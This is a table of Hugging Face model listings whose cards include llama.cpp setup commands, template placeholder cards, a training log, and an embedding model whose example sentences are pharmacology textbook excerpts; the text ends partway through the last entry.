modelId string | author string | last_modified timestamp[us, tz=UTC] | downloads int64 | likes int64 | library_name string | tags list | pipeline_tag string | createdAt timestamp[us, tz=UTC] | card string |
|---|---|---|---|---|---|---|---|---|---|
sizzlebop/MiniCPM4-8B-Q8_0-GGUF | sizzlebop | 2025-06-09T14:42:22Z | 0 | 0 | transformers | [
"transformers",
"gguf",
"llama-cpp",
"gguf-my-repo",
"text-generation",
"zh",
"en",
"base_model:openbmb/MiniCPM4-8B",
"base_model:quantized:openbmb/MiniCPM4-8B",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | text-generation | 2025-06-09T14:41:47Z | ---
license: apache-2.0
language:
- zh
- en
pipeline_tag: text-generation
library_name: transformers
tags:
- llama-cpp
- gguf-my-repo
base_model: openbmb/MiniCPM4-8B
---
# sizzlebop/MiniCPM4-8B-Q8_0-GGUF
This model was converted to GGUF format from [`openbmb/MiniCPM4-8B`](https://huggingface.co/openbmb/MiniCPM4-8B) using llama.cpp via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/openbmb/MiniCPM4-8B) for more details on the model.
## Use with llama.cpp
Install llama.cpp via Homebrew (works on macOS and Linux):
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo sizzlebop/MiniCPM4-8B-Q8_0-GGUF --hf-file minicpm4-8b-q8_0.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo sizzlebop/MiniCPM4-8B-Q8_0-GGUF --hf-file minicpm4-8b-q8_0.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the llama.cpp repo.
Step 1: Clone llama.cpp from GitHub.
```bash
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with the `LLAMA_CURL=1` flag, along with any other hardware-specific flags (e.g., `LLAMA_CUDA=1` for Nvidia GPUs on Linux).
```bash
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```bash
./llama-cli --hf-repo sizzlebop/MiniCPM4-8B-Q8_0-GGUF --hf-file minicpm4-8b-q8_0.gguf -p "The meaning to life and the universe is"
```
or
```bash
./llama-server --hf-repo sizzlebop/MiniCPM4-8B-Q8_0-GGUF --hf-file minicpm4-8b-q8_0.gguf -c 2048
```
|
Xara2west/gpt2-finetuned-coned7 | Xara2west | 2025-06-09T14:27:53Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"gpt2",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T14:27:19Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
efraimdahl/syncopation-transformer-combined | efraimdahl | 2025-06-09T14:27:25Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"generated_from_trainer",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T13:43:22Z | ---
library_name: transformers
tags:
- generated_from_trainer
model-index:
- name: syncopation-transformer-combined
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# syncopation-transformer-combined
This model is a fine-tuned version of [](https://huggingface.co/) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.0537
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 5
- eval_batch_size: 8
- seed: 42
- optimizer: AdamW (torch implementation) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 25
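A quick sanity check on these numbers: with `train_batch_size: 5` and 4350 optimizer steps per epoch (the step counts reported in the results table), the training set holds roughly 21,750 examples. A minimal sketch, assuming no gradient accumulation:

```python
# Relate batch size, steps per epoch, and dataset size.
# Assumes a gradient-accumulation factor of 1 (not stated in the card).
train_batch_size = 5
steps_per_epoch = 4350   # step delta between epochs in the results table
num_epochs = 25

dataset_size = train_batch_size * steps_per_epoch
total_steps = steps_per_epoch * num_epochs

print(dataset_size)  # 21750 training examples (approximate)
print(total_steps)   # 108750 steps, matching the final table row
```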
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:------:|:---------------:|
| 0.1919 | 1.0 | 4350 | 0.0718 |
| 0.0072 | 2.0 | 8700 | 0.0734 |
| 0.0009 | 3.0 | 13050 | 0.0603 |
| 0.049 | 4.0 | 17400 | 0.0770 |
| 0.0496 | 5.0 | 21750 | 0.0554 |
| 0.001 | 6.0 | 26100 | 0.0565 |
| 0.0027 | 7.0 | 30450 | 0.0561 |
| 0.0041 | 8.0 | 34800 | 0.0607 |
| 0.0273 | 9.0 | 39150 | 0.0565 |
| 0.0344 | 10.0 | 43500 | 0.0580 |
| 0.0246 | 11.0 | 47850 | 0.0557 |
| 0.0187 | 12.0 | 52200 | 0.0624 |
| 0.0828 | 13.0 | 56550 | 0.0523 |
| 0.059 | 14.0 | 60900 | 0.0537 |
| 0.2687 | 15.0 | 65250 | 0.0561 |
| 0.0593 | 16.0 | 69600 | 0.0565 |
| 0.0015 | 17.0 | 73950 | 0.0541 |
| 0.0023 | 18.0 | 78300 | 0.0558 |
| 0.0001 | 19.0 | 82650 | 0.0532 |
| 0.0026 | 20.0 | 87000 | 0.0547 |
| 0.0339 | 21.0 | 91350 | 0.0543 |
| 0.001 | 22.0 | 95700 | 0.0567 |
| 0.0553 | 23.0 | 100050 | 0.0545 |
| 0.0038 | 24.0 | 104400 | 0.0536 |
| 0.012 | 25.0 | 108750 | 0.0537 |
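Note that the headline loss (0.0537) is the last-epoch value rather than the best: validation loss bottoms out at epoch 13. A small sketch for picking the best checkpoint from such a log, with the (epoch, validation loss) pairs transcribed from the table above:

```python
# Find the epoch with the lowest validation loss in the training log.
history = [
    (1, 0.0718), (2, 0.0734), (3, 0.0603), (4, 0.0770), (5, 0.0554),
    (6, 0.0565), (7, 0.0561), (8, 0.0607), (9, 0.0565), (10, 0.0580),
    (11, 0.0557), (12, 0.0624), (13, 0.0523), (14, 0.0537), (15, 0.0561),
    (16, 0.0565), (17, 0.0541), (18, 0.0558), (19, 0.0532), (20, 0.0547),
    (21, 0.0543), (22, 0.0567), (23, 0.0545), (24, 0.0536), (25, 0.0537),
]

best_epoch, best_loss = min(history, key=lambda pair: pair[1])
print(best_epoch, best_loss)  # epoch 13, loss 0.0523
```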
### Framework versions
- Transformers 4.51.3
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.1
|
fernandabufon/model_bertimbau_base_toxicity_5_1e-05_0.1_0.1_32_fold_1 | fernandabufon | 2025-06-09T14:26:09Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"bert",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2025-06-09T14:25:43Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
RikoteMaster/embedder-granite | RikoteMaster | 2025-06-09T14:23:46Z | 0 | 0 | sentence-transformers | [
"sentence-transformers",
"safetensors",
"xlm-roberta",
"sentence-similarity",
"feature-extraction",
"generated_from_trainer",
"dataset_size:34441",
"loss:MultipleNegativesRankingLoss",
"arxiv:1908.10084",
"arxiv:1705.00652",
"base_model:ibm-granite/granite-embedding-107m-multilingual",
"base_m... | sentence-similarity | 2025-06-09T14:02:09Z | ---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- generated_from_trainer
- dataset_size:34441
- loss:MultipleNegativesRankingLoss
base_model: ibm-granite/granite-embedding-107m-multilingual
widget:
- source_sentence: inhibitors as antifungal, and antibacterial agents. and in with
sulfonylureas, not combination insulin. During clinical tion in 0.4–0.9%. Adverse
an increased rate of infections (upper respiratory and tract), (when Tzd), hypoglycemia
(when a dose of insulin agogue lowered hypoglycemia. Linagliptin is the class
and appears have properties similar to and tin. It approved for and combination
with metformin, pioglitazone. COMBINATION THERAPY—ORAL ANTIDIABETIC & in 2 Diabetes
Mellitus Failure to maintain response over the owing a in mass, reduction physical
activity, mass, in remains disconcerting problem ment of type Multiple medications
may glycemic there a should initiated with biguanide. clinical failure monotherapy,
a agent or is be insulin dase inhibitor; sulfonylureas insulin because of adverse
safety concerns. Third-line multiple medications, or a injectable intensified
insulin
sentences:
- inhibitors such as antiviral, antifungal, and certain antibacterial agents. Saxagliptin
is approved as monotherapy and in combination with biguanides, sulfonylureas,
and Tzds. It has not been studied in combination with insulin. During clinical
trials, mono- and combination therapy with sitagliptin resulted in an HbA 1c reduc-
tion in the range of 0.4–0.9%. Adverse effects include an increased rate of infections
(upper respiratory tract and urinary tract), headaches, peripheral edema (when
combined with a Tzd), hypoglycemia (when combined with a sulfonylurea), and hypersensitivity
reactions (urticaria, facial edema). The dose of a concurrently administered insulin
secret- agogue or insulin may need to be lowered to prevent hypoglycemia. Linagliptin
is the most recently introduced drug in this class and appears to have properties
similar to sitagliptin and saxaglip- tin. It is approved for use as monotherapy
and in combination with metformin, glimepiride, and pioglitazone. COMBINATION
THERAPY—ORAL ANTIDIABETIC AGENTS & INJECTABLE MEDICATION Combination Therapy in
Type 2 Diabetes Mellitus Failure to maintain a good response to therapy over the
long term owing to a progressive decrease in beta-cell mass, reduction in physical
activity, decline in lean body mass, or increase in ectopic fat deposition remains
a disconcerting problem in the manage- ment of type 2 diabetes. Multiple medications
may be required to achieve glycemic control. Unless there is a contraindication,
medical therapy should be initiated with a biguanide. If clinical failure occurs
with metformin monotherapy, a second agent or insulin is added. The second-line
drug can be an insulin secret- agogue, Tzd, incretin-based therapy, amylin analog,
or a glucosi- dase inhibitor; preference is given to sulfonylureas or insulin
because of cost, adverse effects, and safety concerns. Third-line therapy can
include metformin, multiple other oral medications, or a noninsulin injectable
and metformin and intensified insulin
- '61. Glucocorticoids for gastrointestinal use: See Chapter 62. REFERENCES Alesci
S et al: Glucocorticoid-induced osteoporosis: From basic mechanisms to clinical
aspects. Neuroimmunomodulation 2005;12:1. Bamberger CM, Schulte HM, Chrousos GP:
Molecular determinants of gluco- corticoid receptor function and tissue sensitivity
to glucocorticoids. Endocr Rev 1996;17:245. Charmandari E, Kino T: Chrousos syndrome:
A seminal report, a phylogenetic enigma and the clinical implications of glucocorticoid
signaling changes. Eur J Clin Invest 2010;40:932. Charmandari E, Tsigos C, Chrousos
GP: Neuroendocrinology of stress. Ann Rev Physiol 2005;67:259. Chrousos GP: Stress
and disorders of the stress system. Nat Endocrinol Rev 2009;5:374. Chrousos GP,
Kino T: Glucocorticoid signaling in the cell: Expanding clinical implications
to complex human behavioral and somatic disorders. In: Glucocorticoids and mood:
Clinical manifestations, risk factors, and molecular mechanisms. Proc NY Acad
Sci 2009;1179:153. Elenkov IJ, Chrousos GP: Stress hormones, TH1/TH2 patterns,
pro/anti-in- flammatory cytokines and susceptibility to disease. Trends Endocrinol
Metab 1999;10:359. Elenkov IJ et al: Cytokine dysregulation, inflammation, and
wellbeing. Neuroimmunomodulation 2005;12:255. Franchimont D et al: Glucocorticoids
and inflammation revisited: The state of the art. Neuroimmunomodulation 2002–03;10:247.
Graber AL et al: Natural history of pituitary-adrenal recovery following long-term
suppression with corticosteroids. J Clin Endocrinol Metab 1965;25:11. Hochberg
Z, Pacak K, Chrousos GP: Endocrine withdrawal syndromes. Endocrine Rev 2003;24:523.
Kalantaridou S, Chrousos GP: Clinical review 148:'
- safely and effectively combined with 5-FU-, irinotecan-, and oxaliplatin-based
chemotherapy in the treatment of metastatic colorectal cancer. Bevacizumab is
FDA approved as a first-line treatment for metastatic colorectal cancer in combination
with any intravenous fluoropyrimidine-contain- ing regimen and is now also approved
in combination with che- motherapy for metastatic non-small lung cancer and breast
cancer. One potential advantage of this antibody is that it does not appear to
exacerbate the toxicities typically observed with cytotoxic che- motherapy. The
main safety concerns associated with bevacizumab include hypertension, an increased
incidence of arterial throm- boembolic events (transient ischemic attack, stroke,
angina, and myocardial infarction), wound healing complications, gastrointes-
tinal perforations, and proteinuria. Sorafenib is a small molecule that inhibits
multiple receptor tyrosine kinases (RTKs), especially VEGF-R2 and VEGF-R3, platelet-derived
growth factor-β (PDGFR-β), and raf kinase. It was initially approved for advanced
renal cell cancer and is also approved for advanced hepatocellular cancer. Sunitinib
is similar to sorafenib in that it inhibits multiple RTKs, although the specific
types are somewhat different. They include PDGFR-α and PDGFR-β, VEGF-R1, VEGF-R2,
VEGF-R3, and c-kit. It is approved for the treatment of advanced renal cell cancer
and for the treatment of gastrointestinal stromal tumors (GIST) after disease
progression on or with intolerance to imatinib. Pazopanib is a small molecule
that inhibits multiple RTKs, espe- cially VEGF-R2 and VEGF-R3, PDGFR-β, and raf
kinase. This oral agent is approved for the treatment of advanced renal cell cancer.
Sorafenib, sunitinib, and pazopanib are metabolized in the liver by the CYP3A4
system, and elimination is primarily hepatic with excretion in feces. Each of
these agents has potential interac-
- source_sentence: 774 VII that detected by parathyroid gland, increases in serum
phos- levels reduce the secretion. regulation is the net PTH serum calcium and
reduce serum at the amount increase the amount 24,25(OH) D produced. serum calcium
by reducing secretion. High phosphate by D calcium phosphate, has less effect,
such feedback is again appropriate. 1,25(OH) effect PTH patients chronic are loss
this 2 D-mediated loop intestinal absorption often leads secondary The D to PTH
being exploited with of absorption. Such useful the management of hyperparathy-
roidism chronic kidney be of 1,25(OH) also production This the loop in that FGF23
2 D promoting hypophosphatemia, turn inhibits and 2 production. HORMONAL OF
sentences:
- rier only when the meninges are inflamed. Concentrations in cerebrospinal fluid
are highly variable, ranging from 4% to 64% of serum levels in the setting of
meningeal inflammation. As with all antituberculous drugs, resistance to ethambutol
emerges rapidly when the drug is used alone. Therefore, ethambutol is always given
in combination with other antituberculous drugs. Ethambutol hydrochloride, 15–25
mg/kg, is usually given as a single daily dose in combination with isoniazid or
rifampin. The higher dose is recommended for treatment of tuberculous menin- gitis.
The dose of ethambutol is 50 mg/kg when a twice-weekly dosing schedule is used.
Adverse Reactions Hypersensitivity to ethambutol is rare. The most common serious
adverse event is retrobulbar neuritis, resulting in loss of visual acuity and
red-green color blindness. This dose-related adverse effect is more likely to
occur at dosages of 25 mg/kg/d continued for several months. At 15 mg/kg/d or
less, visual disturbances are very rare. Periodic visual acuity testing is desirable
if the 25 mg/kg/d dosage is used. Ethambutol is relatively contraindicated in
chil- dren too young to permit assessment of visual acuity and red- green color
discrimination. PYRAZINAMIDE Pyrazinamide (PZA) is a relative of nicotinamide.
It is stable and slightly soluble in water. It is inactive at neutral pH, but
at pH 5.5 it inhibits tubercle bacilli at concentrations of approximately 20 mcg/mL.
The drug is taken up by macrophages and exerts its activity against mycobacteria
residing within the acidic environ- ment of lysosomes. Pyrazinamide (PZA) N C
O NH2 N Mechanism of Action & Clinical Uses Pyrazinamide is converted to pyrazinoic
acid—the active form of the drug—by mycobacterial pyrazinamidase, which is encoded
by
- 774 SECTION VII Endocrine Drugs that is detected by the parathyroid gland, increases
in serum phos- phate levels reduce the ionized calcium, leading to enhanced PTH
secretion. Such feedback regulation is appropriate to the net effect of PTH to
raise serum calcium and reduce serum phosphate levels. Likewise, both calcium
and phosphate at high levels reduce the amount of 1,25(OH) 2 D produced by the
kidney and increase the amount of 24,25(OH) 2 D produced. High serum calcium works
directly and indirectly by reducing PTH secretion. High serum phosphate works
directly and indirectly by increasing FGF23 levels. Since 1,25(OH) 2 D raises
serum calcium and phosphate, whereas 24,25(OH) 2 D has less effect, such feedback
regulation is again appropriate. 1,25(OH) 2 D directly inhibits PTH secretion
(independent of its effect on serum calcium) by a direct inhibitory effect on
PTH gene transcription. This pro- vides yet another negative feedback loop. In
patients with chronic renal failure who frequently are deficient in producing
1,25(OH) 2 D, loss of this 1,25(OH) 2 D-mediated feedback loop coupled with impaired
phosphate excretion and intestinal calcium absorption often leads to secondary
hyperparathyroidism. The ability of 1,25(OH) 2 D to inhibit PTH secretion directly
is being exploited with calcitriol analogs that have less effect on serum calcium
because of their lesser effect on intestinal calcium absorption. Such drugs are
proving useful in the management of secondary hyperparathy- roidism accompanying
chronic kidney disease and may be useful in selected cases of primary hyperparathyroidism.
1,25(OH) 2 D also stimulates the production of FGF23. This completes the negative
feedback loop in that FGF23 inhibits 1,25(OH) 2 D production while promoting hypophosphatemia,
which in turn inhibits FGF23 production and stimulates 1,25(OH) 2 D production.
SECONDARY HORMONAL REGULATORS OF BONE MINERAL HOMEOST
- host disease after allogeneic stem cell trans- plantation. Cyclosporine has also
proved useful in a variety of autoimmune disorders, including uveitis, rheumatoid
arthritis, psoriasis, and asthma. Its combination with newer agents is show- ing
considerable efficacy in clinical and experimental settings where effective and
less toxic immunosuppression is needed. Newer for- mulations of cyclosporine have
been developed that are improving patient compliance (smaller, better tasting
pills) and increasing bioavailability. Tacrolimus Tacrolimus (FK 506) is an immunosuppressant
macrolide antibi- otic produced by Streptomyces tsukubaensis. It is not chemically
related to cyclosporine, but their mechanisms of action are similar. Both drugs
bind to cytoplasmic peptidylprolyl isomerases that are abundant in all tissues.
While cyclosporine binds to cyclophilin, tacrolimus binds to the immunophilin
FK-binding protein (FKBP). Both complexes inhibit calcineurin, which is necessary
for the activation of the T-cell-specific transcription factor NF-AT. On a weight
basis, tacrolimus is 10–100 times more potent than cyclosporine in inhibiting
immune responses. Tacrolimus is utilized for the same indications as cyclosporine,
particularly in organ and stem cell transplantation. Multicenter studies in the
USA and in Europe indicate that both graft and patient survival are similar for
the two drugs. Tacrolimus has proved to be effective therapy for preventing rejection
in solid-organ transplant patients even after failure of standard rejection therapy,
including anti-T- cell antibodies. It is now considered a standard prophylactic
agent (usually in combination with methotrexate or mycophenolate mofetil) for
graft-versus-host disease. Tacrolimus can be administered orally or intravenously.
The half-life of the intravenous form is approximately 9–12 hours. Like cyclosporine,
tacrolimus is metabolized primarily by P450 enzymes in the liver, and there is
potential for drug interactions. The dosage is determined by trough blood level
at
- source_sentence: Antiviral 865 TABLE Agents or (HSV) varicella-zoster virus (VZV)
Administration Recommended Dosage and Regimen Acyclovir1 Oral First treatment
mg tid mg 5 daily × Recurrent genital herpes mg 200 times daily 800 bid 3–5 tid
2 days Genital the host treatment Genital in host treatment 5 until healed Orolabial
treatment × days Varicella years) 800 mg qid days Zoster daily Intravenous HSV
5 in host mg/kg treatment 10–15 days Neonatal HSV infection 10–20 mg/kg × Varicella
the host treatment mg/kg q8h days (5% treatment lesion 4 Famciclovir1 episode
treatment mg × days genital 1000 day Genital in HIV-infected 500 5–10 days herpes
250 Genital in the HIV-infected 500 bid Orolabial or suppression 250-500 mg mg
days Oral herpes 1000 mg bid × 10 Recurrent mg Genital herpes HIV-infected 5–10
days herpes once suppression the
sentences:
- CHAPTER 49 Antiviral Agents 865 TABLE 49–1 Agents to treat or prevent herpes simplex
virus (HSV) and varicella-zoster virus (VZV) infections. Route of Administration
Use Recommended Adult Dosage and Regimen Acyclovir1 Oral First episode genital
herpes treatment 400 mg tid or 200 mg 5 times daily × 7–10 days Recurrent genital
herpes treatment 400 mg tid or 200 mg 5 times daily or 800 mg bid × 3–5 days or
800 mg tid × 2 days Genital herpes in the HIV-infected host treatment 400 mg 3–5
times daily × 5–10 days Genital herpes suppression in the HIV-infected host 400–800
mg bid–tid Herpes proctitis treatment 400 mg 5 times daily until healed Orolabial
herpes treatment 400 mg 5 times daily × 5 days Varicella treatment (age ≥ 2 years)
800 mg qid × 5 days Zoster treatment 800 mg 5 times daily × 7–10 days Intravenous
Severe HSV treatment 5 mg/kg q8h × 7–10 days Mucocutaneous herpes in the immunocompromised
host treatment 10 mg/kg q8h × 7–14 days Herpes encephalitis treatment 10–15 mg/kg
q8h × 14–21 days Neonatal HSV infection treatment 10–20 mg/kg q8h × 14–21 days
Varicella or zoster in the immunosuppressed host treatment 10 mg/kg q8h × 7 days
Topical (5% cream) Herpes labialis treatment Thin film covering lesion 5 times
daily × 4 days Famciclovir1 Oral First episode genital herpes treatment 500 mg
tid × 5–10 days Recurrent genital herpes treatment 1000 mg bid × 1 day Genital
herpes in the HIV-infected host treatment 500 mg bid × 5–10 days Genital herpes
suppression 250 mg bid Genital herpes suppression in the HIV-infected host 500
mg bid Orolabial herpes treatment 1500 mg once Orolabial or genital herpes suppression
250-500 mg bid Zoster 500 mg tid × 7 days Valacyclovir1 Oral First episode genital
herpes treatment 1000 mg bid × 10 days Recurrent genital herpes treatment 500
mg bid × 3 days Genital herpes in the HIV-infected host treatment 500–1000 mg
bid × 5–10 days Genital herpes suppression 500–1000 mg once daily Genital herpes
suppression in the HIV
- LA Human leukocyte antigen IFN Interferon IGIV Immune globulin intravenous IL
Interleukin LFA Leukocyte function-associated antigen MAB Monoclonal antibody
MHC Major histocompatibility complex NK cell Natural killer cell SCID Severe combined
immunodeficiency disease TCR T-cell receptor TGF-a Transforming growth factor-β
TH1, TH2 T helper cell types 1 and 2 TNF Tumor necrosis factor
- ', especially in adults with impaired renal function and prolonged elevation of
drug levels. The sudden absorption of postoperatively instilled kanamycin from
the peritoneal cavity (3–5 g) has resulted in curare-like neu- romuscular blockade
and respiratory arrest. Calcium gluconate and neostigmine can act as antidotes.
Although hypersensitivity is not common, prolonged applica- tion of neomycin-containing
ointments to skin and eyes has resulted in severe allergic reactions. ■ SPECTINOMYCIN
Spectinomycin is an aminocyclitol antibiotic that is structurally related to aminoglycosides.
It lacks amino sugars and glycosidic bonds. NH HN CH3 O O CH3 Spectinomycin O
CH3 HO O OH OH Spectinomycin is active in vitro against many gram-positive and
gram-negative organisms, but it is used almost solely as an alternative treatment
for drug-resistant gonorrhea or gonorrhea in penicillin-allergic patients. The
majority of gonococcal isolates are inhibited by 6 mcg/mL of spectinomycin. Strains
of gonococci may be resistant to spectinomycin, but there is no cross-resistance
with other drugs used in gonorrhea. Spectinomycin is rapidly absorbed after intramuscular
injection. A single dose of 40 mg/kg up to a maximum of 2 g is given. There is
pain at the injection site and, occasionally, fever and nausea. Nephrotoxicity
and anemia have been observed rarely. Spectinomycin is no longer available for
use in the United States but may be available elsewhere.'
- source_sentence: Against Gram-Positive Bacilli Aminoglycosides Carbapenems Carbapenems
Cephalosporins Chloramphenicol Tetracyclines Macrolides Penicillins Sulfonamides
Tetracyclines Tigecycline Trimethoprim TABLE Antimicrobial that require are in
with hepatic impairment. Dosage Needed in Contraindicated in Dosage Adjustment
Impairment amantadine, aminoglycosides, carbapenems, cycloserine, didanosine,
ethionamide, penicillins,3 pyrazinamide, stavudine, telavancin, telbivudine, telithromycin,
tenofovir, terbinafine, valacyclovir, zidovudine acid, (long-acting), tetracyclines2
